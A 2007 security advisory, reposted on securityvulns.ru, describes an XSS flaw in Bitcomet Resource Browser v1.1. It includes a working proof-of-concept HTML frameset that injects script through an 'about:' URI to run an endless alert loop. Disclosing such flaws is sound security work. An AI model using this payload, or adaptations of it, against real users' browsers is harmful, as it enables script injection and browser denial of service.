Computer Security

Security Advisory: Bitcomet Resource Browser v1.1 XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  NetAuctionHelp Classified Ads v1.0 SQL Injection

  vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable

  PBLang <= 4.99.17.q Remote File Rewriting / Remote Command Execution

  Aria-Security.net: CoolShot E-Lite POS 1.0

From:jplopezy_(at)_gmail.com <jplopezy_(at)_gmail.com>
Date:25.11.2007
Subject:Bitcomet Resource Browser v1.1 XSS

The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity.

Create an html file and paste the following code

<html>

<frameset rows="100%">

 <frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">


</frameset>

</html>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server